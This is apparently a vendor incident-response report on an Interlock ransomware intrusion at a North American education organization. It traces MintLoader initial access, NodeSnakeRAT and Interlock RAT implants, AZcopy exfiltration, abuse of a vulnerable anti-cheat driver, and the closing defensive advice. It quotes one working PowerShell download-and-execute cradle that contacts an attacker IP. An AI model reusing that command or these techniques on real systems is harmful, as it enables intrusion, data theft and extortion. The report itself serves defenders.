The Interlock ransomware group continues to demonstrate why financially motivated threat actors remain one of the most persistent and adaptive risks facing modern organizations. Active across both the United States and the United Kingdom, Interlock has shown a particular interest in the education sector—an industry often constrained by limited security resources and sprawling, heterogeneous environments.
Unlike many contemporary ransomware operations, Interlock does not function as a Ransomware-as-a-Service (RaaS) affiliate ecosystem. Instead, it appears to be a relatively small, tightly controlled group that develops, operates, and evolves its own malware stack. This independence gives the group a unique operational flexibility, allowing it to iterate quickly on tooling and tactics as defensive controls mature.
This article examines a recent Interlock intrusion investigated by the FortiGuard Incident Response (IR) team. The case highlights how long-dormant footholds, overlooked early indicators, and adaptive post-exploitation techniques can culminate in a high-impact ransomware event months after initial compromise. It also underscores the value of proactive threat hunting, especially when known indicators already exist in public reporting.
A Long-Running Intrusion with Familiar Roots
Early indicators from this intrusion align directly with activity documented by the eSentire Threat Response Unit in July and with components of the Interlock malware ecosystem previously analyzed by Mandiant. While portions of Interlock’s infrastructure and tooling have been publicly disclosed for months, the group has continued to refine its approach—introducing new payloads, rotating command-and-control (C2) infrastructure, and even exploiting a zero-day vulnerability in a gaming anti-cheat driver to bypass endpoint defenses.
At a high level, the intrusion unfolded in three phases:
- Initial access and persistence
- Data access and exfiltration
- Ransomware preparation and deployment
Each phase reveals a methodical, patient adversary willing to pause operations for months until conditions are favorable.
Phase One: Initial Access and Establishing a Foothold
31 March 2025
The victim in this investigation was a North America–based education organization. Initial access was traced to a MintLoader infection on an end user’s laptop. At the time, the affected system did not have endpoint detection and response (EDR) tooling installed.
The initial execution involved a distinctive PowerShell one-liner:
powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"This command dynamically constructed a URL based on the current Unix epoch time, retrieved a remote PowerShell payload, and executed it in memory. The URL structure and command format matched known MintLoader campaigns attributed to TAG-124 infrastructure, which Interlock operators have historically leveraged to identify and target victims in North America.
NodeSnakeRAT Deployment
Following execution, a ZIP archive (download.zip) was created on disk. This archive contained a legitimate Node.js runtime (node.exe) used to execute a malicious JavaScript payload named j1wp4vw8.log (SHA1: 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0).
This payload aligns with malware tracked by Mandiant as an early version of CORNFLAKE and by Quorum as NodeSnakeRAT.B. Throughout this article, it is referred to as NodeSnakeRAT.
Unlike purely fileless implants, NodeSnakeRAT frequently writes secondary payloads to disk. While not exhaustive, IR recovered several artifacts dropped over time, revealing the evolution of the attacker’s tooling and infrastructure. These included additional NodeSnakeRAT payloads, Interlock RAT variants, and auxiliary tooling staged under directories masquerading as legitimate application paths within the user’s roaming profile.
Persistence was established through an autorun registry entry named ChromeUpdater, which was later modified to point to updated NodeSnakeRAT payloads.
Dormancy and Early Lateral Movement
Three days after the initial infection, on April 3, 2025, a brief Remote Desktop Protocol (RDP) connection was made to the organization’s main file server using a default Administrator account that was not actively used. This activity suggests early reconnaissance and credential validation rather than full lateral movement.
On April 21, 2025, NodeSnakeRAT was used to deploy a second JavaScript implant, k4myle3i.dll (SHA1: 6445E5CE51DA03934395ABB5411D3200D12ED7B3). This payload represents an early iteration of Interlock RAT, also tracked as WINDYTWIST.SEA.
After this point, the intrusion entered a prolonged dormant phase. It was assessed that the attacker’s inability to advance was likely due to the compromised laptop being infrequently connected to the corporate network, limiting opportunities for lateral movement during the adversary’s operational windows.
Phase Two: Data Access and Exfiltration
5–15 September 2025
Activity resumed in early September following a rotation of Interlock’s C2 infrastructure. On September 5, the organization’s managed detection and response (MDR) service identified a similar NodeSnakeRAT infection chain on an internal application server.
Because this server showed no evidence of MintLoader or other initial access vectors—and used the same Node.js and JavaScript tooling—this activity was assessed as a continuation of the original intrusion.
A More Capable Interlock RAT
The attacker deployed another Interlock RAT payload (node.log, SHA1: 2D5F88C396553669BD50183644D77AD3C71D72BB) containing new hardcoded C2 IPs. The RAT was implemented as heavily obfuscated JavaScript, with more than 130 dynamically resolved strings retrieved at runtime through a function named a0n().
This design significantly complicates static analysis and string-based detection. Function names and IDs varied across samples, indicating automated or semi-automated build processes.
Upon execution, the RAT collected system information via the systeminfo command, harvesting details such as:
- Username and privilege level
- Domain membership
- Computer name
- Windows version
This data was sent in plaintext to one of several hardcoded C2 servers over TCP port 443. The initial beacon packet included a four-byte magic value (0xDF691155) followed by JSON-formatted system data. Subsequent communications were encrypted using a custom XOR-based scheme.
Supported Command Set
The Interlock RAT supported a wide range of commands, including:
- SOCKS5 proxying for pivoting traffic
- Interactive remote shells (CONSOLE)
- Single-command execution (CONSOLE_ONE_COMMAND)
- Persistence management
- Sleep and disconnect operations
These capabilities enabled the adversary to perform flexible, low-noise post-exploitation across multiple hosts.
Persistence for later-stage RAT implants was achieved through scheduled tasks masquerading as legitimate Windows maintenance jobs, such as:
\Microsoft\Windows\Defrag\ScheduledDefrags\TimeSyncDrive\TimeSyncroDriver
GUI-Driven Operations and ScreenConnect
By mid-September, the attacker shifted tactics. On September 13, ScreenConnect was installed across multiple endpoints using an MSI installer likely generated with Advanced Installer.
The ScreenConnect service communicated with the domain user[.]kangaroosim[.]com, which resolved to 91[.]92.241.179 and was already known in threat intelligence as malicious ScreenConnect infrastructure.
This pivot to GUI-based tooling likely reflected two factors:
- Increased friction from the victim’s EDR tooling
- Greater operator comfort performing interactive exploration and data staging
Using ScreenConnect and chained RDP access, the adversary browsed file servers extensively and modified firewall rules to allow RDP connections.
Data Exfiltration via AZcopy
On September 15, the attacker used RDP to access the primary file server and executed AZcopy (win64.exe, SHA1: BE39DBADFC9CFC494F1B7BF3A04E49C336E0FA0D) to exfiltrate more than 250 GB of data to an Azure storage bucket.
This technique mirrors prior Interlock activity reported by Cisco Talos and represented the only observed bulk exfiltration during the intrusion.
Phase Three: Ransomware Preparation and Deployment
16 September – 12 October 2025
Notably, there was a multi-week delay between data exfiltration and ransomware deployment. IR team assessed that the attackers initially attempted data-only extortion but reverted to encryption when leverage proved insufficient.
Dual-Platform Ransomware
Two ransomware variants were deployed:
- Windows endpoints: JavaScript-based ransomware (
jar.jar, SHA1:AD77FBDBB2FCBDB440428EED3E76D106E1119FCF) - Nutanix hypervisor: Linux ELF binary (
script, SHA1:F5C6BD4E9686AFB0C4E7C1C1733FEBB4065D514F)
On October 10, the attacker accessed the Nutanix environment via SSH using existing administrator credentials. Logical disks were enumerated and encrypted using the ELF payload, adding the .!nt3rlock extension and dropping a ransom note.
Defense Evasion with a Zero-Day Driver
In preparation for widespread ransomware deployment, the attacker attempted to disable Fortinet security tooling using a novel process-killing utility dubbed Hotta Killer (polers.dll, SHA1: 3B9B2D5934F9ED1E3A000A760A6FA90422E8A555).
This tool leveraged a signed but vulnerable anti-cheat driver (UpdateCheckerX64.sys, SHA1: 7556AE58C215B8245A43F764F0676C7A8F0FDD1A) affected by CVE-2025-61155.
By installing the driver as a kernel service and communicating with it via a symbolic link (\\.\HtAntiCheatDriver), the malware attempted to terminate processes matching the pattern Forti*.exe using ZwTerminateProcess().
Windows Ransomware Mechanics
The JavaScript ransomware operated autonomously, using a hardcoded RSA public key and multithreaded AES encryption. It avoided critical system directories and file extensions, employed partial encryption on large files for speed, and deleted itself after execution using a delayed PowerShell command.
Encrypted Windows files were appended with the .gif extension.
Credential Theft and Final Deployment
Before mass deployment, the attackers executed a custom infostealer (move.dll) to harvest browser credentials, cookies, history, and bookmarks from multiple browsers, including Chrome, Edge, Firefox, Brave, and Opera variants.
Extracted data was saved locally as CSV files and likely used to validate credentials for domain-wide ransomware deployment.
Large-scale encryption was then executed via a batch script (W_0.bat) using PsExec and valid domain administrator credentials to remotely execute a PowerShell script (1.ps1) across endpoints.
Key Lessons from the Interlock Intrusion
This case illustrates several critical realities of the modern ransomware landscape:
- Dormant access is dangerous: The initial compromise occurred more than five months before ransomware deployment.
- Known indicators matter: Many IOCs associated with this intrusion had been publicly available for months.
- Adaptation is constant: Interlock evolved from PowerShell loaders to Node.js RATs, GUI tooling, and kernel-level driver abuse.
While Interlock’s approach differs from typical RaaS affiliates, the defensive takeaways remain consistent.
High-ROI Defensive Recommendations
Three defensive controls stand out as particularly effective and low-cost:
- Explicitly block unauthorized remote access tools
Detect and alert on any attempted installation or execution. - Block workstation-to-workstation SMB and RDP
This dramatically reduces lateral movement pathways. - Block outbound PowerShell network connections
Prevents common download cradles used in early-stage compromise.
Each control increases attacker friction, extends defender response windows, and creates high-confidence detection opportunities.
Final Thoughts
The Interlock ransomware group exemplifies a mature, patient adversary willing to invest time in maintaining access, adapting tooling, and exploiting gaps in visibility. This intrusion reinforces the importance of threat-centric intelligence filtering, continuous hunting, and rapid integration of new indicators into defensive tooling.
In today’s threat landscape, ransomware is rarely a single event—it is the final chapter of a story that often begins months earlier.
